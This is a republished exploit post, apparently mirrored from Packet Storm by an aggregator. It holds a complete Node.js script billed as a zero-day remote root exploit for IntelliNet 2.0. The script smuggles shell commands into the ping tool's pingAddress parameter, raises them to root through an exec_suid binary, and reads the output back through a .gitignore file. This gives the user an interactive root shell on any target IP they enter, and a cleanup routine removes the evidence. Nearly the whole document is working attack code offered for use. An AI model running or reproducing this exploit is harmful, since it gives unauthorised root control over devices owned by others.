IntelliNet 2.0 Remote Root

IntelliNet 2.0 Remote Root
2024-9-2 23:59:6 Author: packetstormsecurity.com(查看原文) 阅读量:12 收藏
#!/usr/local/bin/node
const { execSync } = require('child_process');
const readline = require('readline');let TARGET = '';
let COMMAND = '';
let SESSION = '';
const ESCALATE = '/usr/aes/bin/exec_suid';
console.log(`
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⢠⣾⡄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⢀⣼⣿⣧⣶⣶⣶⣦⣤⣀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⣠⣾⢿⣿⣿⣿⣏⠉⠉⠛⠛⠿⣷⣕⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⣠⣾⢝⠄⢀⣿⡿⠻⣿⣄⠀⠀⠀⠀⠈⢿⣧⡀⣀⣤⡾⠀⠀⠀
⠀⠀⠀⢰⣿⡡⠁⠀⠀⣿⡇⠀⠸⣿⣾⡆⠀⠀⣀⣤⣿⣿⠋⠁⠀⠀⠀⠀
⠀⠀⢀⣷⣿⠃⠀⠀⢸⣿⡇⠀⠀⠹⣿⣷⣴⡾⠟⠉⠸⣿⡇⠀⠀⠀⠀⠀
⠀⠀⢸⣿⠗⡀⠀⠀⢸⣿⠃⣠⣶⣿⠿⢿⣿⡀⠀⠀⢀⣿⡇⠀⠀⠀⠀⠀
⠀⠀⠘⡿⡄⣇⠀⣀⣾⣿⡿⠟⠋⠁⠀⠈⢻⣷⣆⡄⢸⣿⡇⠀⠀⠀⠀⠀
⠀⠀⠀⢻⣷⣿⣿⠿⣿⣧⠀⠀⠀⠀⠀⠀⠀⠻⣿⣷⣿⡟⠀⠀⠀⠀⠀⠀
⢀⣰⣾⣿⠿⣿⣿⣾⣿⠇⠀⠀⠀⠀⠀⠀⠀⢀⣼⣿⣿⣅⠀⠀⠀⠀⠀⠀
⠀⠰⠊⠁⠀⠙⠪⣿⣿⣶⣤⣄⣀⣀⣀⣤⣶⣿⠟⠋⠙⢿⣷⡄⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⢀⣿⡟⠺⠭⠭⠿⠿⠿⠟⠋⠁⠀⠀⠀⠀⠙⠏⣦⠀⠀⠀
⠀⠀⠀⠀⠀⠀⢸⡟⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
╔════════════════════════════════════════════╗
║ IntelliNet 2.0 Remote Root Exploit (0-Day) ║
║ Author: Jean Pereira <[email protected]>     ║
╚════════════════════════════════════════════╝
`);
const cleanUp = () => {
  execSync(
    `curl -sL "http://${TARGET}/acorn_data_to.php?cmd=ping-tool&pingAddress=127.0.0.1;rm%20.gitignore;"`
  );
};
const createShell = (cmd) => {
  execSync(
    `curl -sL "http://${TARGET}/acorn_data_to.php?cmd=ping-tool&pingAddress=127.0.0.1;${encodeURIComponent(
      [ESCALATE, cmd].join(' ')
    )}%20%3E%20.gitignore;"`
  );
  return execSync(`curl -sL "http://${TARGET}/.gitignore"`).toString().trim();
};
const rl = readline.createInterface({
  input: process.stdin,
  output: process.stdout,
});
const interactiveShell = () => {
  rl.question(`root@${SESSION.slice(8)}:~# `, (currentCommand) => {
    if (currentCommand.trim() === '!q') {
      console.log('Cleaning up...');
      cleanUp();
      rl.close();
    } else {
      COMMAND = currentCommand;
      let output = createShell(COMMAND);
      console.log(output);
      interactiveShell(); 
    }
  });
};
rl.question('[*] Enter target IP: ', (targetIP) => {
  TARGET = targetIP;
  SESSION = createShell('echo a1b2c3d4$HOSTNAME');
  if (!SESSION.startsWith('a1b2c3d4')) {
    console.log('[*] Could not execute payload, aborting');
    process.exit(0);
  } else {
    console.log('[*] Payload injected to firmware');
    console.log('[*] Launching root shell via exec_suid');
  }
  console.log('');
  interactiveShell();
});
rl.on('close', () => {
  process.exit(0);
});
文章来源: https://packetstormsecurity.com/files/181241/intellinet20-exec.txt
如有侵权请联系:admin#unsafe.sh